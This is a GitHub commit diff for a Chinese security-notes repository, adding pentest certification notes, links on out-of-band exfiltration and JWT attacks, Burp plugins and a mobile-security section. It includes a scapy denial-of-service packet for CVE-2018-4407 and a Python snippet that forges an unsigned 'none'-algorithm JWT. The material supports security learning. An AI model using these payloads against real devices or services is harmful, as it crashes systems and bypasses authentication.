Skip to content

Commit

Permalink
日期 2020.2.24-3.6
Browse files Browse the repository at this point in the history
安全

    RedTeam 笔记
    补充几个笔记漏洞描述和影响版本信息
    1. 协议漏洞记录
    ++ SMB 安全相关内容
    2. 搜索引擎 Hacking 笔记
    ++ 加几个博彩关键词

    BlueTeam 笔记
    1. 取证笔记
    ++ 参考tide团队的文章补充几种日志的查看方法

运维

    笔记
    丰富下工具.md和信息.md的内容
  • Loading branch information
No-Github committed Mar 6, 2020
1 parent e0a13ea commit a8c8ef7
Show file tree
Hide file tree
Showing 76 changed files with 1,375 additions and 418 deletions.
7 changes: 6 additions & 1 deletion .gitignore
Original file line number Diff line number Diff line change
Expand Up @@ -9,4 +9,9 @@
/1earn/安全/笔记/Reverse
/1earn/安全/实验/Misc/sqli-labs-WalkThrough.md
/1earn/Plan/Markdown-Plan.md
/assets/Temp
/assets/Temp
/assets/Temp2
/assets/img/开发/Web
/assets/img/开发/Java
/assets/img/开发/golang
/assets/img/开发/Ruby
97 changes: 91 additions & 6 deletions 1earn/安全/Power-PenTest.md
Original file line number Diff line number Diff line change
Expand Up @@ -38,6 +38,7 @@
* [OSCP](#OSCP)
* [OSCE](#OSCE)
* [Security+](#Security+)
* [PenTest+](#PenTest+)

**💖安全工具**

Expand Down Expand Up @@ -93,7 +94,7 @@
* [进阶技巧](#进阶技巧)
* [HTTP_request_smuggling](#HTTP_request_smuggling)
* [bypass-disable_functions](#bypass-disable_functions)
* [Blind_log](#Blind_log)
* [OOB](#OOB)
* [Web逻辑类漏洞](#Web逻辑类漏洞)
* [Web_Fuzz](#Web_Fuzz)
* [jwt](#jwt)
Expand All @@ -117,6 +118,11 @@
* [物联网设备](#物联网设备)
* [USB-HACKER](#USB-HACKER)

**🖤MobileSec**
* [Android](#Android)
* [IOS](#IOS)
* [IOS_CVE漏洞记录](#IOS_CVE漏洞记录)

---

# 相关资源
Expand Down Expand Up @@ -205,7 +211,9 @@ VulnHub 是一个面向所有人开放的安全靶场,有很多安全环境,
- [Shodan Exploits](https://exploits.shodan.io/welcome)
- [0day.today 1337day Inj3ct0r 漏洞数据库](https://cn.0day.today/)
- [exp库-打造中文最大exploit库](http://www.expku.com/)
- [CPR-Zero](https://cpr-zero.checkpoint.com/)
- [nomi-sec/PoC-in-GitHub](https://github.com/nomi-sec/PoC-in-GitHub)
- [互联网安全漏洞库 | 指尖安全 | 垂直互联网安全媒体](https://www.secfree.com/vul.php)

---

Expand All @@ -220,12 +228,26 @@ VulnHub 是一个面向所有人开放的安全靶场,有很多安全环境,
## 认证资质
### CISP-PTE

注册信息安全专业人员-渗透测试,英文为 Certified Information Security Professional - Penetration Test Engineer ,简称 CISP-PTE。证书持有人员主要从事信息安全技术领域网站渗透测试工作,具有规划测试方案、编写项目测试计划、编写测试用例、测试报告的基本知识和能力。

全程差不多2W人民币,且 WEB 方向居多(2019年是这样的,之后不清楚)

**资源**
- https://blog.zeddyu.info/2019/03/21/CISP-PTE%E8%80%83%E8%AF%95%E5%88%86%E4%BA%AB/#%E5%8D%95%E9%80%89%E9%A2%98
- https://zgao.top/cisp-pte-%E6%B3%A8%E5%86%8C%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95%E5%B7%A5%E7%A8%8B%E5%B8%88%E8%80%83%E8%AF%95-%E6%80%BB%E7%BB%93%E7%BB%8F%E9%AA%8C%E5%88%86%E4%BA%AB/

**CISP-PTS**

注册信息安全专业人员-渗透测试专家,英文为 Certified Information Security Professional - Penetration Testing Specialist ,简称 CISP-PTS。证书持有人员主要从事漏洞研究、代码分析工作,具备对多种攻击方式的技术方法较全面掌握、对最新网络安全动态跟踪研究以及策划解决方案能力。

**CISP-IRE**

注册信息安全专业人员-应急响应工程师,英文为 Certified Information Security Professional – Incident Response Engineer ,简称 CISP-IRE。证书持有人员主要从事信息安全技术领域应急响应工作,具有了解应急响应概况、应急响应基础、应急响应事件监测、应急响应事件分析和处置的基本知识和能力。

**CISP-A**

信息安全系统审计师(ChinaCertified Information System Auditor)是由中国信息安全测评中心根据中央编办授权,于 2016 年推出的国家注册信息系统审计师认证制度。

---

### OSCP
Expand Down Expand Up @@ -259,7 +281,9 @@ CE 更侧重“漏洞挖掘”

### Security+

CompTIA 颁发的认证,各种带 `+` 的认证都出自这个协会.
Security+ 认证是一种中立第三方认证,其发证机构为美国计算机行业协会 CompTIA;是和 CISSP、ITIL 等共同包含在内的国际 IT 业 10 大热门认证之一,和 CISSP 偏重信息安全管理相比,Security+ 认证更偏重信息安全技术和操作,Security+ 认证考试包括选择题和实践题 (要求您在模拟环境下进行实践)。通过该认证证明具备网络安全、合规性和操作安全、威胁和漏洞、应用程序、数据和主机安全、访问控制和身份管理以及加密技术等方面的能力。

> CompTIA 颁发的认证,各种带 `+` 的认证都出自这个协会.
**题库**
- http://comptiaexamtest.com/Security+SY0-401/
Expand All @@ -269,6 +293,13 @@ CompTIA 颁发的认证,各种带 `+` 的认证都出自这个协会.

---

### PenTest+

**文章**
- [中文首发|CompTIA PenTest+ 考证必看指南](https://www.freebuf.com/column/225710.html)

---

# 安全工具
## 渗透套件

Expand Down Expand Up @@ -399,6 +430,7 @@ CompTIA 颁发的认证,各种带 `+` 的认证都出自这个协会.
- [海莲花组织向招聘单位发出应聘请求,并附上简历链接](https://www.freebuf.com/column/194135.html)
- ["毒针"行动 - 针对"俄罗斯总统办所属医疗机构"发起的0day攻击](http://blogs.360.cn/post/PoisonNeedles_CVE-2018-15982.html)
- [被遗漏的0day ? —APT-C-06组织另一网络武器库分析揭秘](http://blogs.360.cn/post/VBScript_vul_CH.html)
- [APT 分析及 TTPs 提取](https://projectsharp.org/2020/02/23/APT%20%E5%88%86%E6%9E%90%E5%8F%8A%20TTPs%20%E6%8F%90%E5%8F%96/)
**资源**
- [kbandla/APTnotes](https://github.com/kbandla/APTnotes)
Expand Down Expand Up @@ -897,6 +929,8 @@ CompTIA 颁发的认证,各种带 `+` 的认证都出自这个协会.
- [HTTP request smuggling](https://saucer-man.com/information_security/368.html)
- [一篇文章带你读懂 HTTP Smuggling 攻击](https://blog.zeddyu.info/2019/12/05/HTTP-Smuggling/)
- [协议层的攻击——HTTP请求走私](https://paper.seebug.org/1048/)
- [Breaking the chains on HTTP Request Smuggler](https://portswigger.net/research/breaking-the-chains-on-http-request-smuggler)
- [从一道题深入HTTP协议与HTTP请求走私](https://xz.aliyun.com/t/6631)
**靶场**
- [ZeddYu/HTTP-Smuggling-Lab](https://github.com/ZeddYu/HTTP-Smuggling-Lab)
Expand All @@ -909,18 +943,31 @@ CompTIA 颁发的认证,各种带 `+` 的认证都出自这个协会.
**工具**
- [yangyangwithgnu/bypass_disablefunc_via_LD_PRELOAD](https://github.com/yangyangwithgnu/bypass_disablefunc_via_LD_PRELOAD)
#### DNS_log
#### OOB
`带外通道技术`
在渗透中,经常碰到关闭回显的漏洞,常见的 XXE 盲注,SQL 盲注,反序列号无回显,这个时候常用到 OOB 带外数据通道,带外通道技术(OOB)让攻击者能够通过另一种方式来确认和利用所谓的盲目(blind)的漏洞。在这种盲目的漏洞中,攻击者无法通过恶意请求直接在响应包中看到漏洞的输出结果。带外通道技术通常需要脆弱的实体来生成带外的 TCP/UDP/ICMP 请求,然后,攻击者可以通过这个请求来提取数据。一次 OOB 攻击能够成功逃避监控,绕过防火墙且能更好的隐藏自己。
**文章**
- [带外通道技术(OOB)总结](https://www.freebuf.com/articles/web/201013.html)
- [OOB(out of band)分析系列之DNS渗漏](https://www.freebuf.com/vuls/138838.html)
- [Burpsuite之BurpCollaborator模块介绍](https://www.jianshu.com/p/92b4b8ddf12f)
- [Gaining persistent access to Burp Suite's Collaborator sessions - a step-by-step guide](https://www.onsecurity.co.uk/blog/gaining-persistent-access-to-burps-collaborator-sessions)
- [Burp Collaborator](https://portswigger.net/burp/documentation/collaborator)
- [HTTP BLIND](https://echocipher.github.io/2019/07/22/HTTP-BLIND/)
**在线监控平台**
- http://ceye.io/
- https://webhook.site
- http://www.dnslog.cn/
**工具**
- [BugScanTeam/DNSLog](https://github.com/BugScanTeam/DNSLog) - 一款监控 DNS 解析记录和 HTTP 访问记录的工具
- [Arno0x/DNSExfiltrator](https://github.com/Arno0x/DNSExfiltrator) - 一个数据泄漏测试工具,可以通过隐蔽渠道窃取数据。
- [uknowsec/SharpNetCheck](https://github.com/uknowsec/SharpNetCheck) - 该工具可以在 dnslog 中回显内网 ip 地址和计算机名,可实现内网中的快速定位可出网机器。
- [Buzz2d0/Hyuga](https://github.com/Buzz2d0/Hyuga) - 一个用来检测带外(Out-of-Band)流量(DNS查询和HTTP请求)的监控工具。
---
### Web逻辑类漏洞
Expand All @@ -942,12 +989,25 @@ CompTIA 颁发的认证,各种带 `+` 的认证都出自这个协会.
- [全程带阻:记一次授权网络攻防演练 (上) ](https://www.freebuf.com/vuls/211842.html)
- [对jwt的安全测试方式总结](https://saucer-man.com/information_security/377.html)
- [攻击JWT的一些方法 ](https://xz.aliyun.com/t/6776)
- [JWT攻击手册:如何入侵你的Token](https://mp.weixin.qq.com/s/x43D718Tw3LZ4QGFxjLjuw)
**Tips**
搜索 JWT 的正则,来自 https://github.com/ticarpi/jwt_tool#tips
```re
[= ]ey[A-Za-z0-9_-]*\.[A-Za-z0-9._-]* -稳定的 JWT 版本
[= ]ey[A-Za-z0-9_\/+-]*\.[A-Za-z0-9._\/+-]* -所有 JWT 版本(可能误报)
```

```python
import jwt
jwt.encode({'字段1':'test','字段2':'123456'},algorithm='none',key='')
```

**工具**
- [JSON Web Tokens - jwt.io](https://jwt.io/) - 在线的 jwt 生成
- [ticarpi/jwt_tool](https://github.com/ticarpi/jwt_tool) - 一个用于验证,伪造和破解JWT(JSON Web令牌)的工具包。
- [Ch1ngg/JWTPyCrack](https://github.com/Ch1ngg/JWTPyCrack)
- [mvetsch/JWT4B](https://github.com/mvetsch/JWT4B)
- [crack JWT](https://pastebin.com/tv99bTNg)
- [brendan-rius/c-jwt-cracker](https://github.com/brendan-rius/c-jwt-cracker)
- [andresriancho/jwt-fuzzer](https://github.com/andresriancho/jwt-fuzzer)
Expand Down Expand Up @@ -1074,6 +1134,10 @@ CompTIA 颁发的认证,各种带 `+` 的认证都出自这个协会.
**漏洞库**
- [工控系统行业漏洞库平台](http://ivd.winicssec.com/index.php/Home/Search/index.html)

**科普文章**
- [探究卫星有关的安全问题](https://www.freebuf.com/articles/wireless/194142.html)
- [卫星安全研究有关的基础知识](https://www.freebuf.com/articles/wireless/202493.html)

## CPU
**Meltdown/Spectre**
- 文章
Expand All @@ -1089,8 +1153,6 @@ CompTIA 颁发的认证,各种带 `+` 的认证都出自这个协会.

## 射频-无线

![image](../../assets/img/才怪.png)
---

## 物联网设备
Expand All @@ -1103,3 +1165,26 @@ CompTIA 颁发的认证,各种带 `+` 的认证都出自这个协会.
## USB-HACKER

![image](../../assets/img/才怪.png)

---

# MobileSec

> 移动安全这块内容我不是很懂,稍微收集一些,可能分类不准确
## Android

**笔记**
- [安卓渗透笔记](./笔记/RedTeam/安卓渗透笔记.md)

## IOS
### IOS_CVE漏洞记录
**CVE-2018-4407**
- 文章
- [远程打挂所有的 apple 设备 — CVE-2018-4407 分析](https://mabin004.github.io/2018/11/01/%E8%BF%9C%E7%A8%8B%E6%89%93%E6%8C%82%E6%89%80%E6%9C%89%E7%9A%84apple%E8%AE%BE%E5%A4%87-CVE-2018-4407-%E5%88%86%E6%9E%90/)

- POC | Payload | exp
```bash
$sudo scapy
>>send(IP(dst="192.168.1.151",options=[IPOption("A"*8)])/TCP(dport=8888,options=[(19, "1"*33)]))
```
7 changes: 5 additions & 2 deletions 1earn/安全/工具/Burp笔记.md
Original file line number Diff line number Diff line change
Expand Up @@ -12,8 +12,9 @@
- https://portswigger.net/

**资源**
- [Mr-xn/BurpSuite-collections](https://github.com/Mr-xn/BurpSuite-collections)
- [snoopysecurity/awesome-burp-extensions](https://github.com/snoopysecurity/awesome-burp-extensions)
- [Mr-xn/BurpSuite-collections](https://github.com/Mr-xn/BurpSuite-collections) - 有关 burpsuite 的插件(非商店),文章以及使用技巧的收集
- [snoopysecurity/awesome-burp-extensions](https://github.com/snoopysecurity/awesome-burp-extensions) - burp 相关资源(英文版)
- [alphaSeclab/awesome-burp-suite](https://github.com/alphaSeclab/awesome-burp-suite) - burp 相关资源(中文版)

**教程**
- [Burp Suite 实战指南](https://t0data.gitbooks.io/burpsuite/content/)
Expand Down Expand Up @@ -57,6 +58,7 @@ Firefox `about:config` 里 `network.captive-portal-service.enabled` 设置成 `f
- [hackvertor/taborator](https://github.com/hackvertor/taborator)
- [NetSPI/BurpCollaboratorDNSTunnel](https://github.com/NetSPI/BurpCollaboratorDNSTunnel)
- [nccgroup/CollaboratorPlusPlus](https://github.com/nccgroup/CollaboratorPlusPlus)
- [PortSwigger/collaborator-everywhere](https://github.com/PortSwigger/collaborator-everywhere)

> burpsuite 的日志插件,不过是增强版本
- [nccgroup/BurpSuiteLoggerPlusPlus](https://github.com/nccgroup/BurpSuiteLoggerPlusPlus)
Expand Down Expand Up @@ -103,6 +105,7 @@ Firefox `about:config` 里 `network.captive-portal-service.enabled` 设置成 `f

> 通过 BurpSuite 来构建自己的爆破字典,可以通过字典爆破来发现隐藏资产.
- [TEag1e/BurpCollector](https://github.com/TEag1e/BurpCollector)
- [orleven/BurpCollect](https://github.com/orleven/BurpCollect) - 基于 BurpCollector 的二次开发, 记录 Burp Map 记录的里的数据包中的目录路径参数名信息,并存入 Sqlite,并可导出 txt 文件。

> 用于解码和修改任意的 protobuf 消息,而不需要定义 protobuf 类型.
- [nccgroup/blackboxprotobuf](https://github.com/nccgroup/blackboxprotobuf)
Expand Down
16 changes: 16 additions & 0 deletions 1earn/安全/笔记/BlueTeam/加固笔记.md
Original file line number Diff line number Diff line change
Expand Up @@ -8,6 +8,22 @@

---

# 大纲

**[操作系统](#操作系统)**
* [Linux](#Linux)
* [Windows](#Windows)

**[web服务和中间件](#web服务和中间件)**

**[业务软件](#业务软件)**
* [数据库](#数据库)
* [mysql](#mysql)
* [远程服务](#远程服务)
* [SSH](#SSH)

---

**文章**
- [如何安全的存储用户的密码](http://xdxd.love/2018/02/26/%E5%A6%82%E4%BD%95%E5%AE%89%E5%85%A8%E7%9A%84%E5%AD%98%E5%82%A8%E7%94%A8%E6%88%B7%E7%9A%84%E5%AF%86%E7%A0%81/)
- [经验分享 | 企业如何做好安全基线配置](https://www.freebuf.com/articles/es/158781.html)
Expand Down
Loading

0 comments on commit a8c8ef7

Please sign in to comment.